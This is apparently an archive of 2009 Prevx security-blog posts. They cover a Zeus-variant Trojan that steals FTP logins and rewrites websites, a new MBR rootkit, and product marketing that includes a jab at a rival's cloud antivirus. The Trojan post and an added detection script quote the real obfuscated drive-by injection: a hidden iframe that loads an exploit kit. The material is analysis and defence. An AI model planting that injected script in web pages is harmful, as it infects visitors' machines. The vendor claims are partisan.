Prevx Blog

Jun 29th

On Wednesday the 24th of June, 2009, Prevx detected a new Trojan that harvests FTP details from compromised machines. The list of compromised machines is vast: we had seen 66,000 unique FTP server logins from unique domains, rising to 74,000 by Friday. The list is now so large that we have no way to inform the affected companies in a meaningful timeframe.

What is the severity of this infection?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential: it includes a cyclic infection which leverages infected PCs to programmatically modify high-volume web sites so that they infect additional users, who in turn become part of the cycle. More users lead to more discovery of web site admin credentials, which leads to more web sites being modified to serve the infection, which leads to more infected users.

What is the infection vector?

The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised web pages contain an injected script that looks something like the example below:

var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');

This causes the browser to visit the site encoded in the script, where an exploit kit tests various exploits against the browser and other installed applications. Once an exploit succeeds, various malware packages are downloaded onto the machine based on geolocation, installed applications and other criteria.

What does the malware do?

Once installed, the malware, which is a variant of the Zeus family, scours the machine's stored form cache looking for stored FTP login credentials; once such logins are found, it sends the data by HTTP POST to a server located in the Cayman Islands. Additionally, there is another component, which acts as a script injector. This component calls a particular script on the server in the Cayman Islands, using the domain goooodbill.cn. The script gives the infected client a URL in the format USERNAME:PASSWORD@FTP.ADDRESS.COM; the client then logs in to the given FTP site, modifies all index pages (asp, php, html) and injects the script. Once the script is injected, all visitors of the modified domain potentially become part of the infection network/cycle.
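A web site owner who suspects their index pages were rewritten by the injector described above needs a way to find the obfuscated iframe without executing it. The script below is an added example written for this post, not Prevx code or anything from the malware itself: it decodes JavaScript unescape('%..') blobs, looks for iframes that a visitor could not see (0 or 1 pixel, or hidden by style) in both the clear text and the decoded blobs, and walks a document root checking the index pages (asp, php, html) the post says get modified. The embedded sample is the single injected line quoted above; the web root it scans is a constructed temporary directory, and the hidden-iframe rule and file names are my assumptions, not the malware's.

```python
import os
import re
from urllib.parse import urlparse

# Hypothetical defender-side scanner (not Prevx code): finds the kind of
# unescape()-obfuscated hidden iframe the post describes, in clear text
# and after decoding the JavaScript unescape('%..') blobs.

# JavaScript unescape() blobs: runs of %XX (and the JS-only %uXXXX form)
UNESCAPE_RE = re.compile(
    r"unescape\(\s*['\"]((?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2})+)['\"]\s*\)"
)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")

# Index pages the post says the injector rewrites (assumed file names)
INDEX_NAMES = {"index.asp", "index.php", "index.html", "index.htm"}

# Constructed sample: one copy of the injected script quoted in the post
SAMPLE_INJECTED = (
    "var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f"
    "%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20"
    "%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72"
    "%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');"
)


def js_unescape(blob):
    """Decode a JavaScript unescape() string: %uXXXX first, then %XX."""
    blob = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), blob)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), blob)


def decode_unescape_blobs(text):
    """Return the decoded payload of every unescape('...') call in text."""
    return [js_unescape(m.group(1)) for m in UNESCAPE_RE.finditer(text)]


def parse_attrs(attr_text):
    """Parse quoted and unquoted HTML attributes into a lower-cased dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def is_hidden(attrs):
    """An iframe a visitor cannot see: 0/1 pixel in either dimension or styled away."""
    tiny = {"0", "1", "0px", "1px"}
    style = attrs.get("style", "").replace(" ", "").lower()
    return (
        attrs.get("width") in tiny
        or attrs.get("height") in tiny
        or "display:none" in style
        or "visibility:hidden" in style
    )


def find_hidden_iframes(text, origin="<string>"):
    """Report hidden iframes found in the raw text or inside decoded unescape() blobs."""
    findings = []
    chunks = [(False, text)] + [(True, b) for b in decode_unescape_blobs(text)]
    for obfuscated, chunk in chunks:
        for m in IFRAME_RE.finditer(chunk):
            attrs = parse_attrs(m.group(1))
            if not is_hidden(attrs):
                continue
            src = attrs.get("src", "")
            findings.append({
                "file": origin,
                "obfuscated": obfuscated,
                "src": src,
                "host": urlparse(src).hostname or "",
                "width": attrs.get("width", ""),
                "height": attrs.get("height", ""),
                "frameborder": attrs.get("frameborder", ""),
            })
    return findings


def scan_webroot(root):
    """Walk a document root and scan every index page for hidden iframes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in INDEX_NAMES:
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(find_hidden_iframes(fh.read(), origin=path))
    return findings


def demo_scan():
    """Constructed web root: one injected index.php and one clean index.html."""
    import tempfile
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php include 'header.php'; ?>\n<script>" + SAMPLE_INJECTED + "</script>\n")
    with open(os.path.join(root, "blog", "index.html"), "w", encoding="utf-8") as fh:
        fh.write('<iframe src="https://example.com/embed" width="640" height="360"></iframe>\n')
    return scan_webroot(root)


if __name__ == "__main__":
    for f in demo_scan():
        print(f"{f['file']}: hidden iframe to {f['host']} (obfuscated={f['obfuscated']})")
```

The decoded sample is a 1x1, borderless iframe, which is why a visitor never sees the redirection; legitimate embeds are normally sized, so the size rule alone separates the two cases in this sample. Run it against a real document root with scan_webroot(path) after taking the site offline, and treat every hit as a reason to rotate the FTP credentials that were used to write the file, since the post explains those credentials were stolen from a client machine rather than guessed.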

Has the malware done anything malicious yet?

YES. As of 15:00 GMT, June 29th 2009, the malware started handing domains to the clients to infect. In a 5 minute period Prevx observed 85 domains being targeted by a single infection. No doubt there are thousands of infected clients already injecting these scripts into the growing list of compromised FTP sites.

What does this mean?

Using the clients to inject the script into the FTP sites ensures that the criminals remain anonymous. Besides that, they have a massive list of high-value, high-traffic websites to target. This means that visitors to those sites will then be infected because of the presence of the script.

As noted above, this is not the only malware that the exploit kit serves; various other password stealers, rootkits and so on are distributed too.


May 29th

MBR Rootkit reloaded

Posted by: Marco Giuliani


Almost two months have passed since we isolated the new variant of the MBR rootkit. We have already written a technical blog post about it and the new techniques used by this nasty rootkit; I thought it would be useful to anyone writing a detector for it.

Unfortunately, two months on, only a couple of security vendors and independent researchers have implemented a working detector for it. This is not good, especially when we are talking about the same threat that infected tens of thousands of PCs around the globe last year, stealing passwords, bank accounts and personal information.

Actually, as written in one of my previous posts, the first version of the MBR rootkit could still be used with great success by its creators. In fact, the main problem for the attacker is the dropper, because of antivirus detection. Nevertheless, MBR rootkit droppers have been able to evade the signature and heuristic detection of most antivirus software: their creators know their dirty job quite well.

Then, once the dropper has infected the system, only a really small number of anti-rootkit tools are able to detect it.

Anyway, the rootkit writers decided to take a step ahead and released what can currently be called the worst rootkit in the wild. Almost every anti-rootkit has been bypassed.

Now, after two months, we've isolated another new variant of this MBR rootkit. Most likely its creators didn't like that a couple of vendors were already able to detect their creature, so they decided to wipe them off.

We checked how many anti-rootkits are able to detect the version of the MBR rootkit we isolated two months ago. The result is that only five applications are able to fully detect this threat, including Prevx 3.0, which was the first.

Now, after this update, we're the only one still able to detect and successfully remove the infection.

The new MBR rootkit includes a much stronger filtering engine, able to filter out more thoroughly every attempt by security software to read the Master Boot Record.

The good news is that they have removed some routines used to hide the hook set by the rootkit for disk access filtering. However, I think this may be a temporary choice, because the DKOH technique previously applied makes the rootkit even more hidden.

The fancy idea of hooking the lower driver to which \Device\Harddisk0\DR0 is attached is still a winning one, because it's quite difficult to bypass.

Even if you manage to unhook it, it will still be difficult to restore the original function, because you are not always dealing with the same hooked driver: the driver can differ from system to system. For example, sometimes the lower driver beneath Disk.sys is ACPI.sys, sometimes vmscsi.sys, and sometimes it's directly atapi.sys. You have to trace down which driver has been hooked and then know which original function was replaced. Annoying, indeed.
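The two paragraphs above describe the detection problem from the defender's side: the rootkit sits below Disk.sys and filters every read of the Master Boot Record, and the hooked driver differs from system to system, so unhooking is unreliable. A detector that does not depend on which driver is hooked compares the first sector as returned through the normal disk stack with a copy obtained by an independent path (offline read, boot media, or a lower-level read) and treats any difference as evidence that something in between is lying. The code below is an added illustration of that cross-view comparison, written for this post and not Prevx 3.0's detection logic; it parses the MBR layout (446 bytes of boot code, four 16-byte partition entries, the 0x55AA signature) and diffs two views. Both views are constructed byte strings (the sample boot code and partition entry are invented), so it runs offline; obtaining the real independent read is platform-specific and is left out.

```python
import hashlib
import struct

# Hypothetical cross-view MBR check (not Prevx code). The post says the rootkit
# filters attempts by security software to read the MBR; here two reads of
# sector 0 are compared region by region. Both reads are constructed samples.

MBR_SIZE = 512
BOOT_CODE_SIZE = 446
PART_ENTRY_SIZE = 16
PART_TABLE_OFFSET = 446
SIGNATURE_OFFSET = 510
BOOT_SIGNATURE = b"\x55\xaa"


def parse_mbr(mbr):
    """Split a 512-byte MBR into boot code, four partition entries and the signature."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFFSET + i * PART_ENTRY_SIZE
        status, _chs_first, ptype, _chs_last, lba_start, sectors = struct.unpack(
            "<B3sB3sII", mbr[off:off + PART_ENTRY_SIZE]
        )
        partitions.append({
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sectors,
        })
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_SIZE]).hexdigest(),
        "partitions": partitions,
        "signature_ok": mbr[SIGNATURE_OFFSET:] == BOOT_SIGNATURE,
    }


def compare_views(filtered_view, raw_view):
    """Return the MBR regions that differ between two reads of sector 0.

    filtered_view: the sector as returned through the normal disk stack, where a
    hooked lower driver can hand back a clean copy.
    raw_view: the sector obtained by an independent path (offline read, boot
    media, direct low-level read). Any difference means something between the
    caller and the disk is filtering.
    """
    differences = []
    if filtered_view[:BOOT_CODE_SIZE] != raw_view[:BOOT_CODE_SIZE]:
        differences.append("boot_code")
    if filtered_view[PART_TABLE_OFFSET:SIGNATURE_OFFSET] != raw_view[PART_TABLE_OFFSET:SIGNATURE_OFFSET]:
        differences.append("partition_table")
    if filtered_view[SIGNATURE_OFFSET:] != raw_view[SIGNATURE_OFFSET:]:
        differences.append("signature")
    return differences


def build_sample_mbr(boot_code):
    """Constructed MBR: the given boot code, one bootable type-0x07 partition, valid signature."""
    code = boot_code.ljust(BOOT_CODE_SIZE, b"\x00")[:BOOT_CODE_SIZE]
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 204800)
    table = entry + b"\x00" * (PART_ENTRY_SIZE * 3)
    return code + table + BOOT_SIGNATURE


# Constructed sample boot code: a few plausible loader bytes, then zero padding
CLEAN_BOOT_CODE = b"\x33\xc0\x8e\xd0\xbc\x00\x7c\x8e\xc0\x8e\xd8"
# Constructed "replaced" boot code: an early jump to a different loader stub
MODIFIED_BOOT_CODE = b"\xeb\x3c\x90" + b"\x00" * 0x3c + b"\xb8\x00\x80"


def demo():
    """The filtered view shows the clean sector; the independent read shows the
    replaced loader with the partition table untouched, the MBR rootkit pattern."""
    filtered = build_sample_mbr(CLEAN_BOOT_CODE)
    raw = build_sample_mbr(MODIFIED_BOOT_CODE)
    return compare_views(filtered, raw)


if __name__ == "__main__":
    print("regions that differ between the two views:", demo())
```

The point of checking regions separately is that a boot-sector infector keeps the partition table intact so the system still boots, so a result of only boot_code differing is the signature to look for; a differing partition table points at something else (a damaged disk, or the wrong device read) and deserves a second look before calling it a rootkit.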

I didn't write this in the first blog post about the new MBR rootkit, but it looks like this idea was picked up from another proof-of-concept bootkit, called Tophet.A and presented at the last XCon conference.

As written before, we are seeing this new MBR rootkit spreading quickly on the internet, as it is dropped by compromised websites hosting malicious iframes and obfuscated JavaScript.

Security vendors should take care of this threat now, instead of waiting for the end of 2009 and then claiming that the MBR rootkit was the worst threat of the year, as happened last year.

Prevx 3.0 is able to fully detect and remove the infection for free.


May 12th

Prevx 3.0 - the smallest, the lightest, the fastest, and also the best!

Firstly, a massive thank you to what has to be one of the smartest security R&D teams in the cyber security industry. Although we have more on the product road map than ever before, Prevx 3.0 seems to be winning people over at every turn. Undoubtedly the smallest, lightest, fastest, and now Editors' Choice in the full review by PCMag.com.

Read the full review at PCMag.com

But, we are nowhere near finished yet

As the dust settles on this review, we turn our attention to the forthcoming Q3 release. This updated version of Prevx 3.0 includes significantly better malware cleanup, additional layers of protection and much more extensive behavioral monitoring and reporting for corporate and consumer techies, while staying as quiet as the current release for the rest of us! So, as they say, the best is still to come.


Apr 30th

Prevx has the only thin-client cloud based anti-malware solution

Firstly, let's define the characteristics of a thin-client, cloud based anti-malware solution. We believe that Prevx 3.0 is a good example. The client or security agent is a tiny 800 kilobyte download. It provides a full range of anti-malware protection, including powerful rootkit and 'early life' malware detection and remediation. It has no locally stored signatures. It has no discernible impact on system performance. It has class-leading low levels of system resource utilization and a minute footprint. It feeds, and feeds off, the world's largest online threat database. It is always up to date. It can scan a system in much less than five minutes.

Compared to Prevx 3.0, Panda's Cloud Antivirus isn't even close

Let me now explain why I believe that Panda's Cloud Antivirus doesn't shape up. Well, firstly, it is an 18 MB download, which Panda obviously thinks is impressive. It is actually 22.5 times bigger than the Prevx 3.0 agent. It isn't even that much smaller than some of the full blown conventional AV packages from vendors like AVG, Symantec, McAfee or Kaspersky. We tested the agent yesterday and were left totally underwhelmed. It missed a commonplace TDS rootkit completely and took more than 1.5 HOURS to scan one of our office PCs running Vista and using a 45 Mbit/s dedicated internet pipe. That is about 30 times longer than Prevx 3.0 took to scan the same PC, find and remove the TDS rootkit.

Panda is only 3 years late to lay claim to being the first with a cloud based AV

I wouldn't mind Panda trying to lay claim to being the first to market with a cloud based AV, but they are actually three years too late to make that claim. I wouldn't mind it quite so much if I hadn't demonstrated our Prevx 1 and Prevx 2 solutions (also cloud based, like Prevx 3.0) to their Chief Technology Officer 3 years ago in Panda's headquarters in Bilbao. With that in mind, such a claim was knowingly false when they made their announcement this week. But I suppose it comes from a market sector that has got used to overhyping security solutions for years; you know, alongside product names like Total Protection and 'all you ever need security for online banking' etc., which are similarly bogus claims. But in Panda's case I find their claims simply rude and offensive given our previous dealings!

We don't even claim Prevx 3.0 is a silver bullet, but Panda's Cloud Antivirus only fires rubber bullets

OK, I can hear the protestations now: but it's only in beta. Maybe the 18 MB download still has debug code in it and it will eventually shed 90% of its bloat before it goes live. But A SILVER BULLET!! Hardly; we wouldn't even claim that for Prevx 3.0. Panda's Cloud Antivirus may claim to be a Silver Plated Rubber Bullet. You know, like the socks described as Cotton Rich that leave your feet aching after 5 days standing at RSA 2009 and 3 days this week at InfoSec.

Panda, we used to sing your praises, and we know you can do better

Having played with Panda's Cloud Antivirus beta for a few hours, I believe it is so far off the mark that it will need a complete redesign and redevelopment to even come close. I'd also recommend downplaying the marketing hype, as it only leads to greater disappointment for your users. Maybe you could position Panda Cloud Antivirus as an in-house proof-of-concept, or better still, a prototype!

